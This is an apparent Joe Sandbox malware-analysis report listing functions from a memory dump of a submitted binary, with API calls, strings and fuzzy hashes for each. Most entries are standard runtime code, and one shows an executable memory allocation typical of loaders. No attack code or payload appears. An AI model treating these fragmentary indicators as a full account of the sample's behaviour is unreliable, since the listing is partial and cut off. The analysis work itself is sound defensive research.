Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: bfa0f590ccd2eede1d3eb2f3c58817cf8f387529c4fea123227705150a75bf0b
Instruction ID: f523bd5d793778c19955734fa6b5b458655bdac2be8334cda998f7843ba71138
Opcode Fuzzy Hash: bfa0f590ccd2eede1d3eb2f3c58817cf8f387529c4fea123227705150a75bf0b
Instruction Fuzzy Hash: C5F0A9B0900705AFDB00BBB0D84AABE3B62EF41300F21415EF5029B3A2CF75AD00CBA5

Function 006E4F0C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,006EC57D,?,00000000,?,?,006EC81E,?,00000007,?,?,006ECD17,?,?), ref: 006E4F22
GetLastError.KERNEL32(?,?,006EC57D,?,00000000,?,?,006EC81E,?,00000007,?,?,006ECD17,?,?), ref: 006E4F2D

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: cb3bd3cbda51dd68f05d06bb349cea14ce35fb1de375c07203ac2ad1d049b1be
Instruction ID: 9e6d29a4f905ac849e07b6c758ec52443e00662852c6f0aaa39d9537bcdef685
Opcode Fuzzy Hash: cb3bd3cbda51dd68f05d06bb349cea14ce35fb1de375c07203ac2ad1d049b1be
Instruction Fuzzy Hash: 9CE086315016046BCF212BA6ED09BA93B5BEF40B95F120065F60996170DE308841C7C8

Function 006D625D Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04654d373c25c8201f31c9bea366c9e78ecb6ced0d02ed3cb1309ef1bd9bc086
Instruction ID: 880b5ebd5eb50e3852e4150cf7eb60ece5a60a93f42e64e973c543b0a7738691
Opcode Fuzzy Hash: 04654d373c25c8201f31c9bea366c9e78ecb6ced0d02ed3cb1309ef1bd9bc086
Instruction Fuzzy Hash: 8E317032D0011AAFCB15CF68D9809EDBBBABF09320B19525BF502A7790E771F954CB90

Function 006E655F Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64fd0f3e8ad6b56148fc52001a0f8fcd353e91823ce5f403517b9f2644fa78e
Instruction ID: bc1fd1460d59068d193ee28efd17227b9e75ff102bb23f5bb03ed95a3288cd70
Opcode Fuzzy Hash: c64fd0f3e8ad6b56148fc52001a0f8fcd353e91823ce5f403517b9f2644fa78e
Instruction Fuzzy Hash: 7401D8337123696F9B159F6BEC40DAA37D7BB953B47288125F911CB298DE30D8118B90

Function 006E5136 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,?,?,006D7FC8,?,?,?,?,?,006D27FE,00000001,?), ref: 006E5168

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 210581ebeb615b5fc71408ee8b900aa5c168c641add464879711484b8844fec1
Instruction ID: 56667e9cf15348b91369534b339ae6725ff46e0156a1ca9c4dc01854aaec3590
Opcode Fuzzy Hash: 210581ebeb615b5fc71408ee8b900aa5c168c641add464879711484b8844fec1
Instruction Fuzzy Hash: EAE06531603BE157DA71276B9C05BEB3A4B9F423A8F150121BC179A3D2DB70DD0181E9

Function 006F4BD0 Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 006F4C66

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ceda8c6b1fe9e82f64f987bb5ca4b59c368b8943ba60626876acd3ff4300fc8e
Instruction ID: e978cde87c5ca0f9ce4b6ff2f4ed47bfe385dfedd7f39f7a6c6c60dee3208132
Opcode Fuzzy Hash: ceda8c6b1fe9e82f64f987bb5ca4b59c368b8943ba60626876acd3ff4300fc8e
Instruction Fuzzy Hash: 5A31A371E002089BDB40DFA8DC81BEEB7F6EF09314F141259EA04B7382EB759A548768

Non-executed Functions

Function 006EDD28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,006EE046,00000002,00000000,?,?,?,006EE046,?,00000000), ref: 006EDDC1
GetLocaleInfoW.KERNEL32(?,20001004,006EE046,00000002,00000000,?,?,?,006EE046,?,00000000), ref: 006EDDEA
GetACP.KERNEL32(?,?,006EE046,?,00000000), ref: 006EDDFF

Strings

ACP, xrefs: 006EDD46
OCP, xrefs: 006EDD7C

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 68c2c9ce378bc4fdbd8fefdb7cd5e9d0c0034dece3b6e83809991e15e9b7ec53
Instruction ID: be3f8328fce487be4d9fb5c50d6a8bea7b0b3d819a15404be6b6da63854b3532
Opcode Fuzzy Hash: 68c2c9ce378bc4fdbd8fefdb7cd5e9d0c0034dece3b6e83809991e15e9b7ec53
Instruction Fuzzy Hash: 9E21AF76602384AADB349F56CD04BE777A7EF54B60B568464E90ADB200F732DE41C790

Function 006EDEFD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006E41E0: GetLastError.KERNEL32(?,00000008,006E708C), ref: 006E41E4
Part of subcall function 006E41E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 006E4286

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 006EE009
IsValidCodePage.KERNEL32(00000000), ref: 006EE052
IsValidLocale.KERNEL32(?,00000001), ref: 006EE061
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006EE0A9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006EE0C8

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4eb0bc8f3a13959009ce06ec9e83d507aae7e4e58fd7d10561b4a23bf8b4a5b4
Instruction ID: 80ce0be7b5aa4ba02bd4d7329f105e56d7c4f073d8e075c5c8dd9378c07d33a3
Opcode Fuzzy Hash: 4eb0bc8f3a13959009ce06ec9e83d507aae7e4e58fd7d10561b4a23bf8b4a5b4
Instruction Fuzzy Hash: 13518E71A02345AFDB10DFA6DC45EFE77BABF19700F040429E905EB291EBB19A14CB61

Function 006ED599 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006E41E0: GetLastError.KERNEL32(?,00000008,006E708C), ref: 006E41E4
Part of subcall function 006E41E0: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 006E4286

GetACP.KERNEL32(?,?,?,?,?,?,006E2903,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006ED65A
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,006E2903,?,?,?,00000055,?,-00000050,?,?), ref: 006ED685
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 006ED7E8

Strings

utf8, xrefs: 006ED757

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: b54206a55f5c750873bc59c7cd22c0fa0304cf80c1975de97a3fcc5ed62262a5
Instruction ID: 4052b05a7671c5a9d5e016b3e722a7cefe4d9658b33a216054ee1109cd1bee82
Opcode Fuzzy Hash: b54206a55f5c750873bc59c7cd22c0fa0304cf80c1975de97a3fcc5ed62262a5
Instruction Fuzzy Hash: 32712575602391AADB24AB76CC86BFB73AAEF44704F14002EF905DB281FB70ED01C665

Function 006E5289 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006E5316

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction ID: ab1759f085885cfbc591bf6a7f054cb1dd3bdacfbd99a593d7d34fedd21ec724
Opcode Fuzzy Hash: 2f7a989578186c1f6a0fdb5e5d34400678512d60c2caa00803a6b2ba2aa04570
Instruction Fuzzy Hash: 15B15B31D067959FDB118F29C8817FEBBE7EF55348F14816AE902AB381D2749D01CB60

Function 006EAAC7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 006EABB7
FindNextFileW.KERNEL32(00000000,?), ref: 006EACAB
FindClose.KERNEL32(00000000), ref: 006EACEA
FindClose.KERNEL32(00000000), ref: 006EAD1D

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 4660f4f0aac0e8e4807671deb83ee0015a1c825448319887b6c783f6b94fa3d8
Instruction ID: f0ab1f72c57ba6c12286d78a49834e02a433af207d023d47bfcf3fa3fdfce16d
Opcode Fuzzy Hash: 4660f4f0aac0e8e4807671deb83ee0015a1c825448319887b6c783f6b94fa3d8
Instruction Fuzzy Hash: 7071F5719062985FDF20EFB9CC89AFABBBBAF45300F1441D9E04997211EA316E85CF15

Function 006D7CC9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006D7CD5
IsDebuggerPresent.KERNEL32 ref: 006D7DA1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006D7DBA
UnhandledExceptionFilter.KERNEL32(?), ref: 006D7DC4

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 487e52c02e423729d3700be873c5c810263a6a9576b3d81c5071e469668c2dca
Instruction ID: 949b9aea458de30f025a78014283568c0c47593c95506ac7fa9f22c622cd5c99
Opcode Fuzzy Hash: 487e52c02e423729d3700be873c5c810263a6a9576b3d81c5071e469668c2dca
Instruction Fuzzy Hash: 4931E7B5D052189ADB20DFA4D949BCDBBB8BF08304F1041AAE50DAB350EB719A84CF85

Function 006D1EE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D1EF5
std::_Lockit::_Lockit.LIBCPMT ref: 006D1F0F
std::_Lockit::~_Lockit.LIBCPMT ref: 006D1F30
std::_Lockit::~_Lockit.LIBCPMT ref: 006D1F88
std::_Lockit::_Lockit.LIBCPMT ref: 006D1FCD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006D201E
__Getctype.LIBCPMT ref: 006D2035
std::_Facet_Register.LIBCPMT ref: 006D205F
std::_Lockit::~_Lockit.LIBCPMT ref: 006D2078

Part of subcall function 006D50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006D50B6

Strings

bad locale name, xrefs: 006D2087

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 2137871723-1405518554
Opcode ID: d7cb7c8fe62e3e7d7413e044caecb932d3380599daa39500c39d4dcd0359b798
Instruction ID: 722e7fd7f27a1dceaad2cb44569abd34ec071538b4ca8846b22d834f274eb1f9
Opcode Fuzzy Hash: d7cb7c8fe62e3e7d7413e044caecb932d3380599daa39500c39d4dcd0359b798
Instruction Fuzzy Hash: F841BE31D043409FC360DF18D480BAABBE2AF91720F19455EF8859B352DB71ED46CB92

Function 006D20A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D20B2
std::_Lockit::_Lockit.LIBCPMT ref: 006D20CF
std::_Lockit::~_Lockit.LIBCPMT ref: 006D20F0
std::_Lockit::~_Lockit.LIBCPMT ref: 006D214B
std::_Lockit::_Lockit.LIBCPMT ref: 006D218C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006D21CF
std::_Facet_Register.LIBCPMT ref: 006D21F8
std::_Lockit::~_Lockit.LIBCPMT ref: 006D2211

Part of subcall function 006D50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006D50B6

Strings

bad locale name, xrefs: 006D2220

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 3096327801-1405518554
Opcode ID: 7e7bc3588256ca98b1bc942244dc789928e3c825e0a60ecb458cffeb735341e4
Instruction ID: 8834dfe3b89320417f334f7cff304586bedc1f8dd79bb86ffcdf41503515355d
Opcode Fuzzy Hash: 7e7bc3588256ca98b1bc942244dc789928e3c825e0a60ecb458cffeb735341e4
Instruction Fuzzy Hash: 2141BF71D043028FC320DF14D891AAABBE2BBA4710F04455EFA859B311DB31EE05CB96

Function 006D2FB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D3011
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006D3058
Concurrency::cancel_current_task.LIBCPMT ref: 006D311A
Concurrency::cancel_current_task.LIBCPMT ref: 006D311F
Concurrency::cancel_current_task.LIBCPMT ref: 006D3124

Strings

false, xrefs: 006D30B2
bad locale name, xrefs: 006D3129
true, xrefs: 006D30D8

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 3b677bca5cbcd1fa87f58ecad793407c66752e97dd351a24ad4f2825ccf6d3e7
Instruction ID: 854c4d8036f2a32170ea9d5c5e8dca793690c05a2125044782a7157e19d8a475
Opcode Fuzzy Hash: 3b677bca5cbcd1fa87f58ecad793407c66752e97dd351a24ad4f2825ccf6d3e7
Instruction Fuzzy Hash: 0D41CF31D057419FC360DF6988817AABBE2AF54700F44492FF5898B352E771DA09CB97

Function 006D7152 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006D7158
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006D7166
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006D7177
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006D7188

Strings

kernel32.dll, xrefs: 006D7153
GetCurrentPackageId, xrefs: 006D7160
GetSystemTimePreciseAsFileTime, xrefs: 006D716C
GetTempPath2W, xrefs: 006D717D

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: e0ef28be54d170852c45089fbb75519f00f41e4f7279174b8fd075725caa0fa8
Instruction ID: 4f375eb3059c47ab65d4535d09b3a1a7a6a4c1fc3116886a27cab29722816ab2
Opcode Fuzzy Hash: e0ef28be54d170852c45089fbb75519f00f41e4f7279174b8fd075725caa0fa8
Instruction Fuzzy Hash: E7E0EC31A41724BF83006F74FC2D9B63EAABA0A71134A1417F602D2160DB708A00CBD4

Function 006DA918 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006DAA37
___TypeMatch.LIBVCRUNTIME ref: 006DAB45
_UnwindNestedFrames.LIBCMT ref: 006DAC97
CallUnexpected.LIBVCRUNTIME ref: 006DACB2

Strings

csm, xrefs: 006DA9C2
csm, xrefs: 006DA955
csm, xrefs: 006DAA6E

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 246d6f66b0d72a3be5c01362b86e2d833ddb4a767329781a3d7023124677d306
Instruction ID: fd7830910134ca71cb6c036ec1ad0c35c2c031f426d5c37c9bbf8177fbe2d842
Opcode Fuzzy Hash: 246d6f66b0d72a3be5c01362b86e2d833ddb4a767329781a3d7023124677d306
Instruction Fuzzy Hash: 66B14671C08209AFCF29DFE4C9819AEBBB6BF18310B15455BE8056B312D731EA51CB96

Function 006E9C65 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 006E9EDE

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: ade0e54273450875109cd03f994111d493ece623408344398aedb2442d45374f
Instruction ID: 9b7671f1e6cbaeca03413c109f1bafbb4b814c098c4092b825ef743e6bce2173
Opcode Fuzzy Hash: ade0e54273450875109cd03f994111d493ece623408344398aedb2442d45374f
Instruction Fuzzy Hash: 6AB1C170A05389AFDB51DFAAC880BEDBBB3AF49310F15415AE5059B392C7709D42CBB1

Function 006F2504 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 006F25AA
__alloca_probe_16.LIBCMT ref: 006F2665
__alloca_probe_16.LIBCMT ref: 006F26F4
__freea.LIBCMT ref: 006F273F
__freea.LIBCMT ref: 006F2745
__freea.LIBCMT ref: 006F277B
__freea.LIBCMT ref: 006F2781
__freea.LIBCMT ref: 006F2791

Memory Dump Source

